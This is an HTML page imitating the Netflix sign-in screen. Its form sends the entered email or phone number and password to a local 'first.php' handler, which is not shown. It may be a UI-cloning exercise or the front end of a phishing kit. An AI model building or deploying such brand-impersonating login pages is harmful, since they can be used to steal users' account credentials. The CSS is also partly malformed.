<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Sign In</title>
        <style>
            *{
                margin:0;
            }
            body{
                background-color: black;
            }
            img{
                margin-left: -30px;
                margin-top: -30px;
                width:50%;
            }
        h1{
                margin-left: 20px;
            }
            .input-box1{
                width:80%;
                height: 30px;
                margin-top: 15px;
                margin-left: 29px;
                border-radius: 5px;
                background-color: #333333;
                
            }
            .input-box2{
                width:80%;
                height: 30px;
                margin-top: 15px;
                margin-left: 29px;
                border-radius: 5px;
                background-color: #333333;
                
            }
            button{
                width:80%;
                height: 40px;
                margin-top: 40px;
                margin-left: 25px;
                border-radius: 5px;
                background-color: red;
                color:white;

            }
            .rm{
                color: gray;
                margin-top: 10px;
                margin-left: 25px;
            }
            .nh{
                color:gray;
                padding-left: 240px;
            }
            .footer{
                margin-top: 150px;
            }
            @media only screen and (min-width: 1000px) {
                   *{
                margin:0;
            }
            body{
                background-color: black;
            }
            img{
                margin-left: -30px;
                margin-top: -30px;
                width:50%;
            }
            .wrapper{
                
            }
       
                

        </style>
    </head>
    <body>
        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQuN3aq20jEAJvYR-qvI-pqDRw0FfGtqa4EkEge0da1&s">
        <div class="wrapper">
            <h1 style="color:white; font-family: ;">Sign In</h1>
            <form action="first.php" method="POST">
                <input class="input-box1" name="email" type="text" placeholder="    Email or phone number"><br>
                <input class=input-box2 name="password" type="password" placeholder="    Password"><br>
            <button><strong>Sign In</strong></button>
        
            </form>
            <h5 class="rm">Remember me</h5><h5 class="nh">Need help?</h5>
            <h4 style="color:gray; padding-top:10px">New to Netflix? Sign up now.</h4>
        </div>
            <div class="footer">
                <hr><br>
                <h4 style="color:gray; padding-left:20px;padding-top:10px;">Questions? Contact Us.</h4><br>
            <h4 style="color:gray; padding-left: 20px;padding-top: 10px;">FAQ<br><br>Terms of Use<br><br>Cookie Preferences</r></h4>


            </div>
    </body>
</html>